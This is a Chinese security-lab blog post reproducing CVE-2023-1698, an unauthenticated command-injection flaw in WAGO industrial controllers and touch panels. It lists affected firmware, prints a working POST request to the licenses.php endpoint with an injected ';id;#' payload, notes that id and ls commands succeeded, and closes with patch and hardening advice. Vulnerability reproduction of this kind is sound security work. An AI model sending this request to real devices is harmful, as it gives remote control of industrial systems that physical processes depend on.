网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
WAGO是一家专业从事电气互连、自动化和接口电子技术的公司。
在 WAGO 的多个产品中,一个漏洞允许未经身份验证的远程攻击者创建新用户并更改设备配置,可能导致意远程RCE、拒绝服务等使整个系统受损。
751-9301Compact Controller CC100 FW20 <= FW22
751-9301Compact Controller CC100 FW23
752-8303/8000-002Edge Controller FW22
750-81xx/xxx-xxxPFC100 FW20 <= FW22
750-81xx/xxx-xxxPFC100 FW23
750-82xx/xxx-xxxPFC200 FW20 <= FW22
750-82xx/xxx-xxxPFC200 FW23
762-5xxxTouch Panel 600 Advanced Line FW22
762-6xxxTouch Panel 600 Marine Line FW22
762-4xxxTouch Panel 600 Standard Line FW22
1.访问漏洞环境
2.对漏洞进行复现
POC (POST)
漏洞复现
POST请求,注入命令执行函数并进行base64编码
POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1
Host: 127.0.0.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
{"package":";id;#"}
id命令执行成功
ls命令执行成功
3.nuclei测试(漏洞存在)
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
1.使用一般安全最佳实践来保护系统免受本地和网络攻击。
2.不允许从不受信任的网络直接访问设备。
3.根据章节解决方案中的表格更新到最新固件。
4.工业控制系统 (ICS) 不应直接从 Internet 访问,而应通过始终如一地应用纵深防御策略加以保护。
https://nvd.nist.gov/vuln/detail/CVE-2023-1698
弥天简介
学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。
口号 网安引领时代,弥天点亮未来
知识分享完了
喜欢别忘了关注我们哦~
学海浩茫,
弥 天
安全实验室
原文始发于微信公众号(弥天安全实验室):【成功复现】WAGO系统远程代码执行漏洞(CVE-2023-1698)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论